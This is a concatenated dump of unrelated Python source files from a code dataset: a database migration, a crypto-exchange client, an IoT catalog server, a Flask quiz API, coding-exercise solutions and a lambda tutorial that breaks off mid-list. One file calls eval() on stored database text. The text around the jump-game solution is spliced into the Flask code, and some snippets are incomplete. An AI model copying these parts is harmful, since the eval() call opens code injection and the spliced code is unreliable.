'a51236f82a74'\ndown_revision = 'a13532f366ab'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index(op.f('ix_pools_base_name'), 'pools', ['base_name'], unique=False)\n op.create_index(op.f('ix_pools_base_symbol'), 'pools', ['base_symbol'], unique=False)\n op.create_index(op.f('ix_pools_name'), 'pools', ['name'], unique=False)\n op.create_index(op.f('ix_pools_quote_name'), 'pools', ['quote_name'], unique=False)\n op.create_index(op.f('ix_pools_quote_symbol'), 'pools', ['quote_symbol'], unique=False)\n op.create_index(op.f('ix_pools_type'), 'pools', ['type'], unique=False)\n op.add_column('tokens', sa.Column('holders', sa.Integer(), nullable=True))\n op.add_column('tokens', sa.Column('total_supply', sa.Float(), nullable=True))\n op.create_index(op.f('ix_tokens_name'), 'tokens', ['name'], unique=False)\n op.create_index(op.f('ix_tokens_symbol'), 'tokens', ['symbol'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_tokens_symbol'), table_name='tokens')\n op.drop_index(op.f('ix_tokens_name'), table_name='tokens')\n op.drop_column('tokens', 'total_supply')\n op.drop_column('tokens', 'holders')\n op.drop_index(op.f('ix_pools_type'), table_name='pools')\n op.drop_index(op.f('ix_pools_quote_symbol'), table_name='pools')\n op.drop_index(op.f('ix_pools_quote_name'), table_name='pools')\n op.drop_index(op.f('ix_pools_name'), table_name='pools')\n op.drop_index(op.f('ix_pools_base_symbol'), table_name='pools')\n op.drop_index(op.f('ix_pools_base_name'), table_name='pools')\n # ### end Alembic commands ###\n","repo_name":"balancednetwork/balanced-backend","sub_path":"balanced_backend/alembic/versions/a51236f82a74_v0_1_0_add_token_fields.py","file_name":"a51236f82a74_v0_1_0_add_token_fields.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43898159113","text":"import time\nimport sqlite3\nimport threading\nimport globalvars\nimport api\nfrom api import polo\n\ndbConn = None\ndbCursor = None\n\ndef dbExec(cursor, query, args=[]):\n cursor.execute(query, args)\n return cursor.fetchall()\n\n# THREAD FUNCTIONS\ndef tickerUpdate(oneshot=False):\n while True:\n globalvars.ticker = polo.returnTicker()\n if oneshot:\n break\n time.sleep(1)\n\ndef balanceUpdate(oneshot=False):\n while True:\n globalvars.balances = api.getAllBalances()\n globalvars.totalBtcBalance = api.getAllBalances(total=True)\n if oneshot:\n break\n time.sleep(300)\n\n# FUNCTIONS\ndef makePairsList():\n pairs = []\n for pair in globalvars.ticker.keys():\n pairs.append(pair)\n return pairs\n\ndef updateAvailablePairs():\n pairs = globalvars.ticker.keys()\n availablePairs = {}\n for pair in pairs:\n base, coin = pair.split('_')\n if base in availablePairs.keys():\n availablePairs[base].append(coin)\n else:\n availablePairs[base] = [coin]\n return availablePairs\n\ndef updateDisplayCurrencies():\n pairs = globalvars.ticker.keys()\n coins = ['BTC']\n for pair in pairs:\n if pair[-3:] == 'BTC':\n base, coin = pair.split('_')\n coins.append(base)\n return coins\n\ndef dbAddGlobalvar(cursor, name, value):\n result = dbExec(cursor, 'SELECT value FROM globalvars WHERE name = ?', [name])\n if len(result) == 0:\n dbExec(cursor, 'INSERT INTO globalvars (name, value) VALUES (?, ?)', [name, str(value)])\n result = dbExec(cursor, 'SELECT value FROM 
globalvars WHERE name = ?', [name])\n return eval(result[0][0])\n\ndef loadInitialData():\n global dbConn, dbCursor\n\n tickerUpdate(oneshot=True)\n balanceUpdate(oneshot=True)\n\n # START THREADS\n tickerThread = threading.Thread(target=tickerUpdate)\n tickerThread.start()\n balanceThread = threading.Thread(target=balanceUpdate)\n balanceThread.start()\n\n # CREATE DATABASE\n dbConn = sqlite3.connect('poloClient.db')\n dbCursor = dbConn.cursor()\n # Create tables\n data = dbExec(dbCursor, 'CREATE TABLE IF NOT EXISTS globalvars (name TEXT, value TEXT)')\n data = dbExec(dbCursor, 'CREATE TABLE IF NOT EXISTS tracked_pairs (name TEXT, base TEXT, coin TEXT)')\n dbConn.commit()\n # CREATE VARIABLES\n globalvars.availablePairs = dbAddGlobalvar(dbCursor, 'availablePairs', updateAvailablePairs())\n globalvars.displayCurrencies = dbAddGlobalvar(dbCursor, 'displayCurrency', updateDisplayCurrencies())\n globalvars.pairsList = dbAddGlobalvar(dbCursor, 'pairsList', makePairsList())\n\n dbConn.commit()\n\nif __name__ == '__main__':\n loadInitialData()\n","repo_name":"muckas/polo-client","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30847777445","text":"from mySql import mysql_\r\nfrom table import table\r\n\r\n\r\nclass ensuring():\r\n def __init__(self, db):\r\n self.db = db\r\n self.ensuringTable = table(['id', 'idUser', 'idCar', 'date', 'outTime', 'backTime'], 'ensuring', ['INT', 'INT', 'INT', 'DATE', 'TIME', 'TIME'])\r\n\r\n def insertToEnsuring(self, ensuringTableValue):\r\n #this function will insert new value into car table\r\n try:\r\n self.db.connect()\r\n ensuringTableValue = mysql_.ConverteToTuple(ensuringTableValue)\r\n self.db.insert(ensuringTableValue, self.ensuringTable)\r\n self.db.close()\r\n return \"Insert To The Table\"\r\n except Exception as e:\r\n return e\r\n def selectAllEnsuring(self):\r\n #this function will return a json of the ensuring table value\r\n try:\r\n self.db.connect()\r\n ensuringTable = self.db.select(self.ensuringTable)\r\n ensuringJsonTable = mysql_.ConverteToJson(self.ensuringTable, ensuringTable)\r\n self.db.close()\r\n return ensuringJsonTable\r\n except Exception as e:\r\n return e\r\n def upadateEnsuring(self, wereList, updateList):\r\n #this function will update a spesific colum in ensuring table\r\n try:\r\n self.db.connect()\r\n self.db.update(self.ensuringTable, updateList, wereList)\r\n self.db.close()\r\n return \"Update The Table\"\r\n except Exception as e:\r\n return e\r\n def deleteEnsuring(self, wereList):\r\n #this function will delete the ensuring from the table\r\n try:\r\n self.db.connect()\r\n self.db.delete(self.ensuringTable ,wereList)\r\n self.db.close()\r\n return \"Delete From The Table\"\r\n except Exception as e:\r\n return e\r\n \r\n def selectSpesificEnsuringr(self, wherelist):\r\n #this function will return a spesific ensuring\r\n try:\r\n self.db.connect()\r\n ensuringTable = self.db.selectWhere(self.ensuringTable , wherelist)\r\n ensuringJsonTable = mysql_.ConverteToJson(self.ensuringTable, ensuringTable)\r\n self.db.close()\r\n return ensuringJsonTable \r\n except Exception as e:\r\n return e\r\n","repo_name":"Jonasinbar/AutoHod","sub_path":"back/ensuring.py","file_name":"ensuring.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26528971592","text":"import pandas as 
pd\n\ndef rising_temperature(weather: pd.DataFrame) -> pd.DataFrame:\n weather = weather.sort_values('recordDate')\n weather['rising'] = weather.temperature.diff() > 0\n weather['consecutive'] = weather.recordDate.diff().dt.days == 1\n return pd.DataFrame(weather[(weather['rising'] == True) & (weather['consecutive'] == True)]['id'])\n\n\n\nif __name__ == '__main__':\n\n df = pd.DataFrame({\n 'id': [1, 2, 3, 4],\n 'recordDate': ['2015-01-01', '2015-01-02', '2015-01-03', '2015-01-04'],\n 'temperature': [10, 25, 20, 30],\n })\n\n df = rising_temperature(df)\n print(df)\n","repo_name":"andrei-radu/leetcode-pandas-mysql","sub_path":"Pandas/197-rising-temperature.py","file_name":"197-rising-temperature.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31496236914","text":"import uuid\nimport os\n\ncreatures = [\n \"Pinguin\",\n \"Seal\",\n \"Moose\",\n \"Dog\",\n \"Elephant\",\n \"Sloth\",\n \"Gorilla\",\n \"Giraffe\",\n \"Polar Bear\",\n \"Platypus\",\n \"Orca\",\n \"Whale\",\n \"Squirel\",\n \"Mouse\",\n \"Meerkat\",\n \"Flamingo\"\n ]\n\nfilename = str(uuid.uuid4().hex)\n\nwith open(filename, \"w\") as f:\n f.writelines([f'{creature}\\n' for creature in creatures])\n\n# You should not need to modify the code above this line\n# Start to write your code below this line\n\n# Use variable filename the file\n\n\n\n\n\n# Do not remove below code\nos.remove(filename)\n","repo_name":"ludusregio/pattern","sub_path":"file-to-dictionary/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22026215738","text":"from utils.db_api.sqlite import Database\n\ndb = Database()\n\ndef test():\n db.create_table_users()\n users = db.select_all_users()\n print(f\"До добавления пользователей: {users}\")\n db.add_user(1, \"One\")\n db.add_user(2, \"Two\")\n db.add_user(3, \"Tree\")\n users = db.select_all_users()\n print(f\"После добавления пользователей: {users}\")\n user = db.select_user(Name=\"Tree\", id=3)\n print(f\"Получил пользователя {user}\")\n\ntest()\n","repo_name":"TwoThousandGit/financial-bot","sub_path":"utils/db_api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40281297998","text":"import cherrypy, json, os, threading, time\r\nimport paho.mqtt.client as pmqtt\r\n\r\nclass Subscriber:\r\n def __init__(self,clientID,topic,devices,updateFile):\r\n self.clientID = clientID\r\n self.devices = devices\r\n self.updateFile = updateFile\r\n self.topic = topic\r\n self.mypmqtt = pmqtt.Client(clientID, False)\r\n self.mypmqtt.on_message = self.myReceived\r\n self.mypmqtt.on_connect = self.myOnConnect\r\n\r\n def myOnConnect (self, paho_mqtt, userdata, flags, rc):\r\n print(\"Connected to %s with result code: %d\" % (self.messageBroker, rc))\r\n\r\n def start(self):\r\n self.mypmqtt.connect(\"test.mosquitto.org\",1883)\r\n self.mypmqtt.loop_start()\r\n self.mypmqtt.subscribe(self.topic, 2)\r\n\r\n def stop(self):\r\n self.mypmqtt.unsubscribe(self.topic)\r\n self.mypmqtt.loop_stop()\r\n self.mypmqtt.disconnect()\r\n\r\n def myReceived (self, pmqtt , userdata, msg):\r\n data = json.loads(msg.payload)\r\n if msg.topic == \"/tiot/8/devices\":\r\n if \"deviceID\" and \"RESTuri\" and \"MQTTtopic\" and \"resource\" in data:\r\n 
self.devices[data[\"deviceID\"]] = dict(RESTuri=data[\"RESTuri\"],MQTTtopic=data[\"MQTTtopic\"],resource=data[\"resource\"],insert_timestamp=time.time())\r\n elif msg.topic == \"/tiot/8/users\":\r\n if \"userID\" and \"name\" and \"surname\" and \"email\" in data:\r\n self.devices[data[\"userID\"]] = dict(name=data[\"name\"],surname=data[\"surname\"],email=data[\"email\"])\r\n elif msg.topic == \"/tiot/8/services\":\r\n if \"serviceID\" and \"RESTuri\" and \"MQTTtopic\" and \"type\" in data:\r\n self.devices[data[\"serviceID\"]] = dict(RESTuri=data[\"RESTuri\"],MQTTtopic=data[\"MQTTtopic\"],type=data[\"type\"],insert_timestamp=time.time())\r\n self.updateFile()\r\n\r\n\r\nclass Broker:\r\n exposed = True\r\n\r\n def __init__(self):\r\n self.brokerIP = \"test.mosquitto.org\"\r\n self.brokerPort = \"1883\"\r\n\r\n def GET(self, *uri, **params):\r\n if len(uri) == 0:\r\n return f\"\"\"{{\\\r\n \"brokerIP\": \"{self.brokerIP}\",\r\n \"port\": \"{self.brokerPort}\"\r\n }}\"\"\"\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\nclass Controller(threading.Thread):\r\n def __init__(self, devices, updateFile):\r\n threading.Thread.__init__(self)\r\n self.devices=devices\r\n self.updateFile = updateFile\r\n\r\n def run(self):\r\n while True:\r\n for key in list(self.devices):\r\n if (time.time()-self.devices[key][\"insert_timestamp\"])>120:\r\n self.devices.pop(key)\r\n self.updateFile()\r\n time.sleep(60)\r\n\r\nclass Devices:\r\n exposed = True\r\n\r\n def __init__(self):\r\n self.devices = dict()\r\n self.readFile()\r\n self.controller = Controller(self.devices, self.updateFile)\r\n self.controller.start()\r\n self.subscriber = Subscriber(\"Devices subscriber\", \"/tiot/8/devices\",self.devices,self.updateFile)\r\n self.subscriber.start()\r\n\r\n def readFile(self):\r\n if os.stat('data.json').st_size != 0: #file non è vuoto\r\n filedict=dict()\r\n f = open('data.json','r')\r\n filedict = json.load(f)\r\n if \"Devices\" in filedict:\r\n self.devices = filedict[\"Devices\"].copy()\r\n f.close()\r\n\r\n def updateFile(self):\r\n filedict=dict()\r\n if os.stat('data.json').st_size != 0:\r\n f=open('data.json','r') \r\n filedict = json.load(f) \r\n f.close()\r\n f=open('data.json','w') \r\n filedict[\"Devices\"] = self.devices.copy()\r\n json.dump(filedict, f)\r\n f.close()\r\n\r\n\r\n def GET(self, *uri, **params):\r\n if len(uri)==1 and uri[0]==\"registered\" and len(params)==0:\r\n if (len(self.devices)==0):\r\n out={\"Error\":\"No registered devices.\"}\r\n return json.dumps(out)\r\n else:\r\n return json.dumps(self.devices)\r\n elif len(uri)==1 and uri[0]==\"registered\" and len(params)==1:\r\n if (len(self.devices)==0):\r\n out={\"Error\":\"No registered devices.\"}\r\n return json.dumps(out)\r\n else:\r\n if \"deviceID\" in params:\r\n if params[\"deviceID\"] in self.devices:\r\n return json.dumps(self.devices[params[\"deviceID\"]])\r\n else:\r\n value=params[\"deviceID\"]\r\n out = {\"Error\": f\"The inserted deviceID:'{value}' is not registered.\"}\r\n return json.dumps(out)\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\n def POST(self, *uri, **params):\r\n if len(uri) == 0:\r\n data = json.loads(cherrypy.request.body.read())\r\n if \"deviceID\" and \"RESTuri\" and \"MQTTtopic\" and \"resource\" in data:\r\n self.devices[data[\"deviceID\"]] = dict(RESTuri=data[\"RESTuri\"],MQTTtopic=data[\"MQTTtopic\"],resource=data[\"resource\"],insert_timestamp=time.time())\r\n 
self.updateFile()\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\nclass Users:\r\n exposed = True\r\n\r\n def __init__(self):\r\n self.users = dict()\r\n self.readFile()\r\n self.subscriber = Subscriber(\"Users subscriber\", \"/tiot/8/users\",self.users,self.updateFile)\r\n self.subscriber.start()\r\n\r\n def readFile(self):\r\n if os.stat('data.json').st_size != 0: #file non è vuoto\r\n filedict=dict()\r\n f = open('data.json','r')\r\n filedict = json.load(f)\r\n if \"Users\" in filedict:\r\n self.users = filedict[\"Users\"].copy()\r\n f.close()\r\n\r\n def updateFile(self):\r\n filedict=dict()\r\n if os.stat('data.json').st_size != 0:\r\n f=open('data.json','r')\r\n filedict = json.load(f) \r\n f.close() \r\n f=open('data.json','w') \r\n filedict[\"Users\"] = self.users.copy()\r\n json.dump(filedict, f)\r\n f.close()\r\n\r\n def GET(self, *uri, **params):\r\n if len(uri)==1 and uri[0]==\"registered\" and len(params)==0:\r\n if (len(self.users)==0):\r\n out={\"Error\":\"No registered users.\"}\r\n return json.dumps(out)\r\n else:\r\n return json.dumps(self.users)\r\n elif len(uri)==1 and uri[0]==\"registered\" and len(params)==1:\r\n if (len(self.users)==0):\r\n out={\"Error\":\"No registered users.\"}\r\n return json.dumps(out)\r\n else:\r\n if \"userID\" in params:\r\n if params[\"userID\"] in self.users:\r\n return json.dumps(self.users[params[\"userID\"]])\r\n else:\r\n value=params[\"userID\"]\r\n out = {\"Error\": f\"The inserted userID:'{value}' is not registered.\"}\r\n return json.dumps(out)\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\n def POST(self, *uri, **params):\r\n if len(uri) == 0:\r\n data = json.loads(cherrypy.request.body.read())\r\n if \"userID\" and \"name\" and \"surname\" and \"email\" in data:\r\n self.users[data[\"userID\"]] = dict(name=data[\"name\"],surname=data[\"surname\"],email=data[\"email\"])\r\n self.updateFile()\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\nclass Services:\r\n exposed = True\r\n\r\n def __init__(self):\r\n self.services = dict()\r\n self.readFile()\r\n self.controller = Controller(self.services, self.updateFile)\r\n self.controller.start()\r\n self.subscriber = Subscriber(\"Services subscriber\", \"/tiot/8/services\",self.services,self.updateFile)\r\n self.subscriber.start()\r\n\r\n def readFile(self):\r\n if os.stat('data.json').st_size != 0: #file non è vuoto\r\n filedict=dict()\r\n f = open('data.json','r')\r\n filedict = json.load(f)\r\n if \"Services\" in filedict:\r\n self.services = filedict[\"Services\"].copy()\r\n f.close()\r\n\r\n def updateFile(self):\r\n filedict=dict()\r\n if os.stat('data.json').st_size != 0:\r\n f = open('data.json','r')\r\n filedict = json.load(f)\r\n f.close() \r\n f = open('data.json','w')\r\n filedict[\"Services\"] = self.services.copy()\r\n json.dump(filedict, f)\r\n f.close()\r\n\r\n def GET(self, *uri, **params):\r\n if len(uri)==1 and uri[0]==\"registered\" and len(params)==0:\r\n if (len(self.services)==0):\r\n out={\"Error\":\"No registered services.\"}\r\n return json.dumps(out)\r\n else:\r\n return json.dumps(self.services)\r\n elif len(uri)==1 and uri[0]==\"registered\" and len(params)==1:\r\n if (len(self.services)==0):\r\n out={\"Error\":\"No registered services.\"}\r\n return json.dumps(out)\r\n else:\r\n if 
\"serviceID\" in params:\r\n if params[\"serviceID\"] in self.services:\r\n return json.dumps(self.services[params[\"serviceID\"]])\r\n else:\r\n value=params[\"serviceID\"]\r\n out = {\"Error\": f\"The inserted serviceID:'{value}' is not registered.\"}\r\n return json.dumps(out)\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\n def POST(self, *uri, **params):\r\n if len(uri) == 0:\r\n data = json.loads(cherrypy.request.body.read())\r\n if \"serviceID\" and \"RESTuri\" and \"MQTTtopic\" and \"type\" in data:\r\n self.services[data[\"serviceID\"]] = dict(RESTuri=data[\"RESTuri\"],MQTTtopic=data[\"MQTTtopic\"],type=data[\"type\"],insert_timestamp=time.time())\r\n self.updateFile()\r\n else:\r\n raise cherrypy.HTTPError(400, \"Wrong input format.\")\r\n else:\r\n raise cherrypy.HTTPError(404, \"Uri not found.\")\r\n\r\nif __name__==\"__main__\":\r\n conf={\r\n '/':{\r\n 'request.dispatch':cherrypy.dispatch.MethodDispatcher(),\r\n 'tool.session.on':True\r\n }\r\n }\r\n\r\n cherrypy.tree.mount(Broker(),'/broker',conf)\r\n cherrypy.tree.mount(Devices(),'/devices',conf)\r\n cherrypy.tree.mount(Users(),'/users',conf)\r\n cherrypy.tree.mount(Services(),'/services',conf)\r\n cherrypy.config.update({'server.socket_host': '0.0.0.0'})\r\n cherrypy.engine.start()\r\n cherrypy.engine.block()","repo_name":"simsax/Internet-of-Things","sub_path":"IoT/SW/SW_2/es_1/catalog.py","file_name":"catalog.py","file_ext":"py","file_size_in_byte":11155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21557203297","text":"\"\"\"\n\nRevision ID: a78f4b5d7dee\nRevises: 73d96d3120ff\nCreate Date: 2017-11-16 23:18:23.416997\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"a78f4b5d7dee\"\ndown_revision = \"73d96d3120ff\"\n\n\ndef upgrade():\n op.add_column(\n \"users\",\n sa.Column(\n \"has_2fa\", sa.Boolean(), server_default=sa.text(\"false\"), nullable=False\n ),\n )\n op.create_index(op.f(\"ix_users_has_2fa\"), \"users\", [\"has_2fa\"], unique=False)\n\n\ndef downgrade():\n op.drop_index(op.f(\"ix_users_has_2fa\"), table_name=\"users\")\n op.drop_column(\"users\", \"has_2fa\")\n","repo_name":"jazzband/website","sub_path":"migrations/versions/a78f4b5d7dee_.py","file_name":"a78f4b5d7dee_.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"32"} +{"seq_id":"9615564307","text":"from core import DumpReader, DatabaseHandler\n\nimport sys\ndump = DumpReader('/data/project/wd-analyst/wikidata-20151207-all.json.bz2', 100)\ndata = {}\n\n\nfor item_content in dump.run():\n if item_content['type'] != 'item':\n continue\n no_labels = len(item_content.get('labels', {}))\n no_site_links = len(item_content.get('sitelinks', {}))\n no_descriptions = len(item_content.get('descriptions', {}))\n no_claims = 0\n for pid in item_content.get('claims', {}):\n no_claims += len(item_content['claims'][pid])\n for pid in item_content.get('claims', {}):\n claims = item_content['claims'][pid]\n pid_int = int(pid.split('P')[1])\n for claim in claims:\n uniqe_added = False\n no_qua = len(claim.get('qualifiers', []))\n no_refs = len(claim.get('references', []))\n for ref in claim.get('references', []):\n for snak in ref.get('snaks', []):\n ref_pid = int(snak.split('P')[1])\n data_to_add = [1, no_labels, no_site_links, no_descriptions, no_claims, no_qua, 
no_refs]\n\n old_data = data.get((ref_pid, 0, 0), [0] * len(data_to_add))\n new_data = [data_to_add[i] + old_data[i] for i in range(len(data_to_add))]\n data[(ref_pid, 0, 0)] = new_data\n\n old_data = data.get((ref_pid, pid_int, 0), [0] * len(data_to_add))\n new_data = [data_to_add[i] + old_data[i] for i in range(len(data_to_add))]\n data[(ref_pid, pid_int, 0)] = new_data\n\n for val in ref['snaks'][snak]:\n try:\n val = val['datavalue']['value']['numeric-id']\n except KeyError:\n pass\n except TypeError:\n pass\n else:\n old_data = data.get((ref_pid, pid_int, val), [0] * len(data_to_add))\n new_data = [data_to_add[i] + old_data[i] for i in range(len(data_to_add))]\n data[(ref_pid, pid_int, val)] = new_data\n\n old_data = data.get((ref_pid, 0, val), [0] * len(data_to_add))\n new_data = [data_to_add[i] + old_data[i] for i in range(len(data_to_add))]\n data[(ref_pid, 0, val)] = new_data\n\ndb_handler = DatabaseHandler('ref')\n\ndb_handler.connect()\ndb_handler.cursor.execute('DROP TABLE ref;')\ndb_handler.finalize()\n\nsql_query = \"\"\"\nCREATE TABLE ref\n(\nref_property INT(15) NOT NULL,\nclaim_property INT(15) NOT NULL,\nvalue INT(15) NOT NULL,\nno_item INT(15) NOT NULL,\nno_labels INT(15) NOT NULL,\nno_site_links INT(15) NOT NULL,\nno_descriptions INT(15) NOT NULL,\nno_claims INT(15) NOT NULL,\nno_qua INT(15) NOT NULL,\nno_ref INT(15) NOT NULL\n);\n\"\"\"\ndb_handler.connect()\ndb_handler.cursor.execute(sql_query)\ndb_handler.finalize()\n\ndb_handler.connect()\nfor case in data:\n val = data[case]\n insert_statement = (\n \"INSERT INTO ref \"\n \"(ref_property, claim_property, value, no_item, no_labels, \"\n \"no_site_links, no_descriptions, no_claims, no_qua, no_ref) \"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\")\n db_handler.cursor.execute(insert_statement, tuple(case) + tuple(data[case]))\n\ndb_handler.finalize()\n","repo_name":"Ladsgroup/wd-analyst","sub_path":"wd-analyst/ref_based.py","file_name":"ref_based.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"14634875838","text":"class Solution(object):\n def jump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n curmax,premax,jump=0,0,0\n i=0\n while curmax', methods=['GET'])\ndef get_quiz(quiz_id):\n quiz = [quiz for quiz in quizzes if quiz['id'] == quiz_id]\n if len(quiz) == 0:\n return jsonify({'error': 'Quiz not found'})\n return jsonify(quiz[0])\n\n# Add a new quiz\n@app.route('/quizzes', methods=['POST'])\ndef add_quiz():\n new_quiz = {\n 'id': quizzes[-1]['id'] + 1,\n 'title': request.json['title'],\n 'questions': request.json['questions']\n }\n quizzes.append(new_quiz)\n return jsonify({'message': 'Quiz added successfully'})\n\n# Update an existing quiz\n@app.route('/quizzes/', methods=['PUT'])\ndef update_quiz(quiz_id):\n quiz = [quiz for quiz in quizzes if quiz['id'] == quiz_id]\n if len(quiz) == 0:\n return jsonify({'error': 'Quiz not found'})\n quiz[0]['title'] = request.json['title']\n quiz[0]['questions'] = request.json['questions']\n return jsonify({'message': 'Quiz updated successfully'})\n\n# Delete a quiz\n@app.route('/quizzes/', methods=['DELETE'])\ndef delete_quiz(quiz_id):\n quiz = [quiz for quiz in quizzes if quiz['id'] == quiz_id]\n if len(quiz) == 0:\n return jsonify({'error': 'Quiz not found'})\n quizzes.remove(quiz[0])\n return jsonify({'message': 'Quiz deleted successfully'})\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n# quizzes.py (Data for testing)\nquizzes = 
[\n {\n 'id': 1,\n 'title': 'General Knowledge Quiz',\n 'questions': [\n {'question': 'What is the capital of France?', 'answer': 'Paris'},\n {'question': 'Who painted the Mona Lisa?', 'answer': 'Leonardo da Vinci'},\n {'question': 'Which planet is known as the Red Planet?', 'answer': 'Mars'}\n ]\n },\n {\n 'id': 2,\n 'title': 'Science Quiz',\n 'questions': [\n {'question': 'What is the atomic symbol for gold?', 'answer': 'Au'},\n {'question': 'Who developed the theory of general relativity?', 'answer': 'Albert Einstein'},\n {'question': 'What is the largest organ in the human body?', 'answer': 'Skin'}\n ]\n }\n]\n","repo_name":"antonovproject21/Quizjoin","sub_path":"Quizjoin.py","file_name":"Quizjoin.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9944242050","text":"from collections import defaultdict, deque\n\nv, e = (int(_) for _ in input().split())\n\nedges = []\nundirected = defaultdict(list)\n\nfor _ in range(e):\n u, v = input().split()\n edges.append((u, v))\n undirected[u].append(v)\n undirected[v].append(u)\n directed = defaultdict(list)\n\n root = edges[0][0]\n que = deque([root])\n reverse = False\n new_edges = []\n while que:\n size = len(que)\n for _ in range(size):\n u = que.popleft()\n for v in undirected[u]:\n if reverse:\n directed[u].append(v)\n new_edges.append((u, v))\n\n else:\n directed[v].append(u)\n new_edges.append((v, u))\n reverse = not reverse\n\n result \n \n \n\n","repo_name":"GizawAAiT/Competitive_programming","sub_path":"codeforces/C_Graph_Without_Long_Directed_Paths.py","file_name":"C_Graph_Without_Long_Directed_Paths.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"70998384730","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport jpype\nimport jpype.dbapi2 as dbapi2\nimport os\nimport logging\nfrom .base import DrillDialect, DrillCompiler_sadrill\n\n\nclass DrillDialect_jdbc(DrillDialect):\n jdbc_db_name = \"drill\"\n jdbc_driver_name = \"org.apache.drill.jdbc.Driver\"\n\n statement_compiler = DrillCompiler_sadrill\n logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)\n\n def __init__(self, *args, **kwargs):\n super(DrillDialect_jdbc, self).__init__(*args, **kwargs)\n\n # The user is responsible for starting the JVM with the class path, but we can\n # do some sanity checks to make sure they are pointed in the right direction.\n if not jpype.isJVMStarted():\n raise Exception(\"The JVM must be started before connecting to a JDBC driver.\")\n try:\n jpype.JClass(\"org.apache.drill.jdbc.Driver\")\n except TypeError:\n err = \"The drill JDBC driver class was not located in the CLASSPATH `%s`\"%str(jpype.java.lang.System.getProperty('java.class.path'))\n raise Exception(err)\n\n def initialize(self, connection):\n super(DrillDialect_jdbc, self).initialize(connection)\n\n \"\"\"\n Open a connection to a database using a JDBC driver and return\n a Connection instance.\n dsn: Database url as required by the JDBC driver.\n driver_args: Dictionary or sequence of arguments to be passed to\n the Java DriverManager.getConnection method. Usually\n sequence of username and password for the db. Alternatively\n a dictionary of connection arguments (where `user` and\n `password` would probably be included). 
See\n http://docs.oracle.com/javase/7/docs/api/java/sql/DriverManager.html\n for more details\n \"\"\"\n def create_connect_args(self, url):\n if url is not None:\n params = super(DrillDialect, self).create_connect_args(url)[1]\n\n # We only need the dsn url as an argument\n cargs = (self._create_jdbc_url(url), )\n\n # Everything else is passed as keywords\n cparams = {p: params[p] for p in params if p not in ['host', 'port']}\n\n logging.info(\"Cargs:\" + str(cargs))\n logging.info(\"Cparams\" + str(cparams))\n\n return (cargs, cparams)\n\n def _create_jdbc_url(self, url):\n return \"jdbc:drill:drillbit=%s:%s\" % (\n url.host,\n url.port or 31010\n )\n\n @classmethod\n def dbapi(cls):\n return dbapi2\n\ndialect = DrillDialect_jdbc\n","repo_name":"JohnOmernik/sqlalchemy-drill","sub_path":"sqlalchemy_drill/jdbc.py","file_name":"jdbc.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"32"} +{"seq_id":"44162018520","text":"\"\"\"\nвстроенные функции \n\"\"\"\n\"\"\"\nАнонимные функции - lambda (Обычная функция с одной особенностью, у нее нет имени)\nПринимает сколько угодно параметров, но всегда возврощяет одно выражение\n\"\"\"\n\n# def hello():\n# return 'hello'\n# print(hello())\n\n# x = lambda: 'hello'\n# print(x())\n\n# x = lambda a, b, c: (a * b) % c\n# print(x(5, 5, 5))\n\n# x = lambda num1, num2, degree=None: (num1 * num2) ** degree if degree else num1 * num2 \n# print(x(2, 2, 3))\n# print(x(5, 5))\n\n# def myFunc(n):\n# return lambda num: num * n\n\n# my_doubler = myFunc(2)\n# print(my_doubler(50))\n\n# list_ = ['hello', 'mil', 'john', 'daniel', 